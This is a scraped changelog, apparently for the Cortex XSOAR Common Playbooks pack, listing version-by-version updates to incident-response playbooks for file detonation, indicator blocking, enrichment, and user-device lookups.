- Deprecated sub-playbooks were removed, including Detonate File - ThreatGrid, Detonate File - JoeSecurity, CrowdStrike Falcon Sandbox - Detonate file, Detonate File - HybridAnalysis.
- Updated the playbook description.
Detonate and Analyze File - Generic
- Updated the playbook output to include several missing command outputs for JoeSecurity V2e integration.
- Updated the playbook description.
- 30206
Download
Playbooks
Calculate Severity By Highest DBotScore
Improved the performance of the playbook by ensuring that only unique indicators are retrieved from the cache.
Cloud IAM Enrichment - Generic
- Fixed an issue where the playbook would attempt to enrich users even when the username input was empty.
- Added additional sub-outputs related to the risky user history to the declared outputs of the playbook.
Get Email From Email Gateway - Generic
Removed the User ID input because it was not being used.
- 30774
Download
Playbooks
Extract Indicators From File - Generic v2
- Fixed an issue with extracting indicators from PDF files and image files.
- Playbook does not relay on the rasterize-pdf command to convert PDF to images.
Block Indicators - Generic v3
Added a default value for the "Tag" input. This will tag blocked indicators with a tag which is then used by the Phishing alert layout in Cortex XSOAR and Cortex XSIAM to display the blocked indicators.
- 30590
Download
Playbooks
Block Domain - Generic
Deprecated. Use 'Block Domain - Generic v2' instead.
Block Domain - Generic v2
Added the input 'Expiration' to support the expiration date and time for blocked domains.
Block Email - Generic
- Deprecated. Use 'Block Email - Generic v2' instead.
Block Account - Generic v2
- Fixed conditional tasks with incorrect names for Clarizen and Okta integrations.
- Added a tasks that retrieves account IDs to block from SailPoint IAM.
- Minor visibility improvements.
Block Account - Generic
Deprecated. Use 'Block Account - Generic v2' instead.
- 29521
Download
Playbooks
Endpoint Enrichment - Generic v2.1
Added support for the Cortex Core - IR integration, which adds the Identity Threat Detection & Response (ITDR) functionality to Cortex XSIAM.
Account Enrichment - Generic v2.1
Added support for the Cortex Core - IR integration, which adds the Identity Threat Detection & Response (ITDR) functionality to Cortex XSIAM.
Entity Enrichment - Generic v3
Added support for the Cortex Core - IR integration, which adds the Identity Threat Detection & Response (ITDR) functionality to Cortex XSIAM.
- 30029
Download
Playbooks
Threat Hunting - Generic
Updated the sub-playbooks inputs and the script arguments from simple to complex values.
Search And Delete Emails - Generic v2
Updated the conditional task to check if the integration O365 - Security And Compliance - Content Search v2
is available beside the checks if the O365 - Security And Compliance - Content Search (Deprecated)
is available.
Calculate Severity - Generic v2
Updated the conditional task 15 to ignore case when Severities.EmailAuthenticitySeverity
Equals Medium.
Search Endpoints By Hash - Generic V2
Added the input inputs.MD5
to the inputs of the sub-playbook Search Endpoints By Hash - Carbon Black Response V2
.
Retrieve File from Endpoint - Generic V3
Updated the script arguments on task 5 from simple to complex values.
Search Endpoint by CVE - Generic
Fixed an issue with conditional task that check if the integration RiskSense
is available.
Email Headers Check - Generic
Updated the condition in task 1 to check if the key Email.HeadersMap
is not empty. This change was made from using the condition is defined
to utilizing is not empty
.
- 29711
Download
Playbooks
Entity Enrichment - Generic v3
- Fixed an issue where risky users and hosts were not outputted from the Entity Enrichment playbook.
- Added the URLSSLVerification input to allow control over whether to verify SSL certificates for URLs from within the Entity Enrichment playbook inputs.
Endpoint Enrichment - Generic v2.1
Fixed an issue that caused all risky hosts to be outputted, instead of only the risk context of the endpoint being enriched.
- 29309
Download
Playbooks
Detonate and Analyze File - Generic
The sub-playbook "Detonate and Analyze File - JoeSecurity" is no longer in use and has been replaced by the sub-playbook "Detonate File - JoeSecurity V2".
Detonate File - Generic
Added the Detonate File - ThreatGrid v2 sub-playbook to replace the deprecated and EOL Detonate File - ThreatGrid sub-playbook. The Detonate File - ThreatGrid sub-playbook will reach its end of life (EOL) at: Sep 01, 2023 and it will still be available for six months after the EOL date. Use the ThreatGrid v2 integration instead.
- 28950
Download
Playbooks
Block Email - Generic v2
- Modified the 'fromType' parameter in the 'mimecast-create-policy' command from 'everyone' to 'individual_email_address' to prevent the complete blocking of email activities across the user organization.
- Added a a conditional task to confirm the emails intended for blocking, received from the playbook input 'EmailToBlock'.
Command-Line Analysis
- Decoded command has been added as inputs to the 'Compare Process Execution Arguments To LOLBAS Patterns' sub-playbook.
- 29016
Download
Playbooks
Detonate File - Generic
- The sub-playbook "CrowdStrike Falcon Sandbox - Detonate File" is no longer in use and has been replaced by the sub-playbook "Detonate File - CrowdStrike Falcon Sandbox v2". The old playbook will still be available for six months, after which it will be removed from the marketplace.
New: Cloud User Investigation - Generic
New: This playbook performs an investigation on a specific user in cloud environments, using queries and logs from Azure Log Analytics, AWS CloudTrail, G Suite Auditor, and GCP Logging.
(Available from Cortex XSOAR 6.9.0).
- 28843
Download
Playbooks
Command-Line Analysis
- The sub-playbook "New: Compare Process Execution Arguments To LOLBAS Patterns" has been added. This sub-playbook checks if a given process exists in the LOLBAS repository. If it does, the playbook proceeds to compare the incident's command line against known patterns of malicious commands listed in LOLBAS. The results will be added to the "CommandlineVerdict" output and will influence the overall verdict.
Account Enrichment - Generic v2.1
- Added the 'xdr-list-risky-users' automation to retrieve an account's risk score and factors influencing the score from Cortex XDR.
Endpoint Enrichment - Generic v2.1
- Added the 'xdr-list-risky-hosts' automation to retrieve a host's risk score and factors influencing the score from Cortex XDR.
- 28667
- 28597
- 28659
Download
Playbooks
Block IP - Generic v2
- Deprecated. Use the
Block IP - Generic v3
playbook instead.
Endpoint Enrichment - Generic v2.1
- Updated deprecated command from cb-sensor-info to cb-edr-sensors-list. The deprecated command cb-sensor-info is part of VMware Carbon Black EDR pack and has reached its end of life (EOL) on July 01, 2022.
Please use the integration Carbon Black EDR v2 instead. - Updated deprecated command from extrahop-device-search to extrahop-devices-search.
- Added new outputs CarbonBlackEDR.Sensor
Isolate Endpoint - Generic V2
- Replaced sub-playbook
Block Endpoint - Carbon Black Response V2
with sub-playbookBlock Endpoint - Carbon Black Response V2.1
. - Removed the unnecessary outputs: CbResponse.Sensors.CbSensorID, CbResponse.Sensors.Status, CbResponse.Sensors.Isolated.
- Added new outputs: CarbonBlackEDR.Sensor, CarbonBlackEDR.Sensor.id, CarbonBlackEDR.Sensor.id, CarbonBlackEDR.Sensor.status.
- 27100
Download
Playbooks
New: Cloud Compute Enrichment - Generic
- New: This playbook provides a generic enrichment of AWS, GCP, and Azure compute resources.
New: Cloud Enrichment - Generic
- New:
Generic Cloud Enrichment Playbook
The Cloud Enrichment - Generic Playbook is designed to unify all the relevant playbooks concerning the enrichment of information in the cloud. It provides a standardized approach to enriching information in cloud environments.
Supported Blocks
- Cloud IAM Enrichment - Generic
- Enriches information related to Identity and Access Management (IAM) in the cloud.
- Cloud Compute Enrichment - Generic
- Enriches information related to cloud compute resources.
The playbook supports a single CSP enrichment at a time.
- Enriches information related to cloud compute resources.
- 27331
Download
Playbooks
Block Email - Generic v2
- Added command cisco-sma-list-entry-append. The command will replace the deprecated command cisco-email-security-list-entry-add which is part fo Cisco Email Security pack and will reach its end of life (EOL) on Jul 01, 2023.
The command cisco-sma-list-entry-append will be removed from the playbook after EOL date.
Please use the integration Cisco SMA instead.
CVE Enrichment - Generic v2
- Replaced the command cve-search (XFE) with the command cve-search.
Domain Enrichment - Generic v2
- Removed command vt-private-get-domain-report. This command is part of the deprecated VirusTotal (Deprecated) pack,
which has reached its end of life (EOL) and is no longer supported. Please use the integration VirusTotal (API v3) instead.
- 26983
Download
Playbooks
New: Get User Devices by Email Address - Generic
This playbook retrieves information on all of the associated user devices, based on the user email.
In order to get a generic output, the following information on all of the retrieved devices will be saved under the UserDevices
context key:
- Name
- Serial Number
- ID
- Model
- MAC Address
- OS
- Integration
Note that not all of the supported integrations will be able to retrieve this information.
Supported integrations: - jamf v2
- Google Workspace (Gsuite)
- ServiceNow v2
- Active Directory Query v2
- Microsoft Graph API (In order to get devices details, provide the permissions as mentioned here: https://learn.microsoft.com/en-us/graph/api/user-list-owneddevices?view=graph-rest-1.0&tabs=http ) (Available from Cortex XSOAR 6.8.0).
New: Get User Devices - Generic
This playbook retrieves information on all of the associated user devices.
In order to get a generic output, the following information on all of the retrieved devices will be saved under the UserDevices
context key:
- Name
- Serial Number
- ID
- Model
- MAC Address
- OS
- Integration
Note that not all of the supported integrations will be able to retrieve this information.
In order to get the full list of supported integrations, read the following sub-playbooks descriptions: - Get User Devices by Username - Generic
- Get User Devices by Email Address - Generic (Available from Cortex XSOAR 6.8.0).
New: Get User Devices by Username - Generic
This playbook retrieves information on all of the associated user devices, based on the user's username.
In order to get a generic output, the following information on all of the retrieved devices will be saved under the UserDevices
context key:
- Name
- Serial Number
- ID
- Model
- MAC Address
- OS
- Integration
Note that not all of the supported integrations will be able to retrieve this information.
Supported integrations: - jamf v2
- Microsoft Defender for Endpoint
- Cortex XDR IR
- ServiceNow v2
- Google Workspace (Gsuite)
- Active Directory Query v2
(Available from Cortex XSOAR 6.8.0).
- 26591
Download
Playbooks
Detonate File - Generic
- Updated the playbook to use the OPSWAT-Filescan opswat-filescan-scan-file command instead of the deprecated SNDBOX sub-playbook.
Detonate URL - Generic
- Updated the playbook to use the OPSWAT-Filescan opswat-filescan-scan-url command.
- 26495
- 26021
- 26580
- 26507
Download
Playbooks
User Investigation - Generic
- Added task to set the key value
NumOfOktaFailedLogon
to zero if there is no result from a failed login search.- Added task to set the key value
NumOfSiemFailedLogon
to zero if there is no result from a failed login search.
- Added task to set the key value
- 26133
- 26048
Download
Playbooks
Account Enrichment - Generic v2.1
- Fixed the condition in task 58
Is there a manager?
where it also needed to verify thatMSGraphUser.ID
exists. - Fixed an issue in task 54. The playbook input
UserEmail
value was changed fromAccount.Email.Address
toAccount.Email
.
- 26156
Download
PUBLISHER
PLATFORMS
INFO
Certification | Certified | Read more |
Supported By | Cortex | |
Created | August 17, 2020 | |
Last Release | April 25, 2024 |